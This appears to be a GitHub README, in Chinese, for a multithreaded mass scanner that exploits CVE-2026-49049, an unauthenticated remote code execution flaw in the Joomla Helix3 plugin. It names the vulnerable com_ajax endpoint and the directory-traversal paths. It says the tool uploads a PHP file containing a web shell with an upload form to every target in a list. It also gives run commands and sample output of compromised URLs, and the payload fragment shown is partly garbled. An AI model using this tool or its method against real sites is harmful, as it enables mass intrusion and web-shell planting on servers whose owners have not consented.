Jenderal92/CVE-2026-49049
GitHub: Jenderal92/CVE-2026-49049
针对 Joomla Helix3 插件 CVE-2026-49049 远程代码执行漏洞的批量扫描器,支持多线程并发检测大量目标。
Stars: 0 | Forks: 0
# CVE-2026-49049 批量扫描器
用于 CVE-2026-49049(Joomla Helix3 框架中的未授权远程代码执行漏洞)的批量漏洞扫描器。
## 📌 描述
此工具用于检测多个 Joomla 站点是否存在 **Helix3** 插件中的 **CVE-2026-49049** 漏洞。该漏洞允许未经身份验证的攻击者在目标服务器上传并执行任意 PHP 代码。
扫描器会尝试执行以下操作:
1. 利用带有 `helix3` 插件的 `com_ajax` endpoint。
2. 上传一个无害的 PHP 信息/payload 文件。
3. 检测该文件是否被执行,还是仅作为原始 PHP 代码存储。
## ⚡ 特性
- **批量扫描**,支持多线程(默认 20 个线程)。
- **两种检测模式**:
- ✅ **易受攻击** – PHP 代码被执行(成功 RCE)。
- ⚠️ **原始 PHP** – 文件已上传但未被执行(代码泄露)。
- **自动生成 payload** 并使用随机文件名。
- **输出保存**至单独的文件中,以便进一步分析。
- **轻量级**,速度快,并具备超时处理机制。
## 📦 前置条件
- **Python 2.7**
- `requests` 库
```
pip install requests
```
🛠 安装说明
```
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
```
🚀 使用方法
```
python2 cve-2026-49049.py targets.txt
```
输入格式
targets.txt 中的每一行应包含一个域名或 IP:
```
example.com
https://example.com
http://192.168.1.100
```
输出文件
文件 描述
results.txt payload 被成功执行的易受攻击 URL
rez.txt payload 已上传但未执行(原始 PHP)的 URL
输出示例
```
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
```
⚙️ 配置
您可以在脚本中调整以下变量:
变量 默认值 描述
THREADS 20 并发线程数
PATHS ['../../../', '../../../../'] 目录遍历路径
TIMEOUT 5 HTTP 请求超时时间
RESULT_FILE 'results.txt' 易受攻击站点的输出文件
RAW_RESULT_FILE 'rez.txt' 原始 PHP 站点的输出文件
🧠 工作原理
脚本会向以下地址发送 POST 请求:
```
/index.php?option=com_ajax&plugin=helix3&format=json
```
其 payload 会执行以下操作:
1. 指定一个目录遍历路径(例如,../../../)
2. 上传一个具有随机名称的 PHP 文件
3. 包含一个简单的 web shell / 信息页面
随后,它会检查该文件是否可访问,以及 PHP 代码是被执行了,还是仅作为纯文本显示。
Payload 示例
```
'.$s.'
'.php_uname()."\n".'
'; // ... upload form ?> ``` ⚠️ 免责声明 此工具仅供教育和授权测试目的使用。 在未经明确许可的情况下,对您不拥有的系统使用此工具是违法的。作者对因滥用此工具而造成的任何误用或损害概不负责。 更多免责声明,您可以查看 Jenderal92 封面上的内容。您可以点击[这里 !!!](https://github.com/Jenderal92/)查看
标签:CISA项目, Python, 无后门, 编程工具, 网络信息收集, 远程代码执行, 逆向工具